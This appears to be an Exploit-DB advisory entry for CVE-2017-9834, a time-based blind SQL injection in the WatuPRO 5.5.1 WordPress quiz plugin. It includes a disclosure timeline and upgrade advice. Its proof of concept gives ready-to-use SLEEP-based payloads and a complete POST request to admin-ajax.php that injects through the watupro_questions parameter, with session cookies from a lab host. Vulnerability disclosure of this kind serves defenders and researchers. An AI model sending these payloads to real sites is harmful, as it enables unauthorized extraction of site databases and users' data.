SQL Injection In WatuPRO (WordPress Plugin to Create Exams, Tests and Quizzes)

vendor:

WatuPRO

by:

Manich Koomsusi

9,8

CVSS

CRITICAL

SQL Injection

CWE

Product Name: WatuPRO

Affected Version From: 5.5.1

Affected Version To: 5.5.1

Patch Exists: YES

Related CWE: CVE-2017-9834

CPE: a:calendarscripts:watupro

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: WordPress 4.7.5

2017

SQL Injection In WatuPRO (WordPress Plugin to Create Exams, Tests and Quizzes)

SQL Injection in WatuPRO WordPress Plugin for create exams, Tests and Quizzes allow the attacker dump the database contents. This plugin sending quizzes to the server with “watupro_questions” parameter not sanitize before take SQL statement.

Mitigation:

Sanitize the input before taking SQL statement.

Source

Exploit-DB raw data:

#####################################
Exploit Title: SQL Injection In WatuPRO (WordPress Plugin to Create Exams, Tests and Quizzes)
Exploit Author: Manich  Koomsusi
Date: 03-07-2017
Software: WatuPRO
Version: 5.5.1
Website: http://calendarscripts.info/watupro/
Tested on: WordPress 4.7.5
Software Link: https://1drv.ms/u/s!AhfkvGaDTn1bmgHSj9u_jQX8iME0
CVE: CVE-2017-9834
#####################################

Description
==================================
SQL Injection in WatuPRO WordPress Plugin for create exams, Tests and Quizzes allow the attacker dump the database contents.

Vulnerability
==================================
This plugin sending quizzes to the server with “watupro_questions” parameter not sanitize before take SQL statement.

Proof of concept
==================================
Take exams or quizzes and submit to the server in POST method

Payload : “1:1,2) AND 4761=IF((41=41),SLEEP(5),4761) AND (4547=4547”    the server delay response time around ~5 second.
Payload : “1:1,2) AND 4761=IF((41=41),SLEEP(0),4761) AND (4547=4547”    the server not delay response time.

############
POST /pt/wordpress/wp-admin/admin-ajax.php HTTP/1.1
Content-Length: 292
Accept-Language: en-US,en;q=0.5
Host: 192.168.5.189
Accept: text/plain, */*; q=0.01
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
DNT: 1
Connection: close
X-Requested-With: XMLHttpRequest
Referer: http://192.168.5.189/pt/wordpress/
Cookie: wordpress_155e4542aeb2c66021dab6903e684bdb=admin%7C1497811093%7CaY85tN6gH7x8iYCzPETIcEJYYyn6tZlzJnbhTZLgZYX%7C475cf68a551a0db99cd991e958fc949bfe8f2a833bf39d0534ce25d29c11a9b8; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_155e4542aeb2c66021dab6903e684bdb=admin%7C1497811093%7CaY85tN6gH7x8iYCzPETIcEJYYyn6tZlzJnbhTZLgZYX%7C61ef1ea8c998118da9dd01d5f650dc0806f8bfbb1d5f28fdbb626f062bcebbcd; wp-settings-time-1=1497748191; PHPSESSID=rh7v9qt9ibdlioth3cecr5gg94
Content-Type: application/x-www-form-urlencoded
action=watupro_submit&quiz_id=1&question_id%5B%5D=1&watupro_questions=1:1,2)%20AND%204761%3dIF((41%3d41),SLEEP(5),4761)%20AND%20(4547%3d4547&post_id=5&answer-1%5B%5D=1&question_1_hints=&taker_email=hacker%40admin.com<http://40admin.com>&h_app_id=0.24749700+1497748201&start_time=2017-06-18+01%3A10%3A01&in_ajax=1
#############


Mitigations
==================================
Upgrade to version 5.5.3.7 or later.

Timeline
==================================
2017-06-19: Discovered the bug
2017-06-19: Reported to vendor
2017-06-19: First response from vendor saying software it fixed. But the vendor fix not properly
2017-06-20: Version 5.5.3.7 released “Fixed issue with input validate.”
2017-07-03: Advisory published

Discovered By:
=====================
Manich  Koomsusi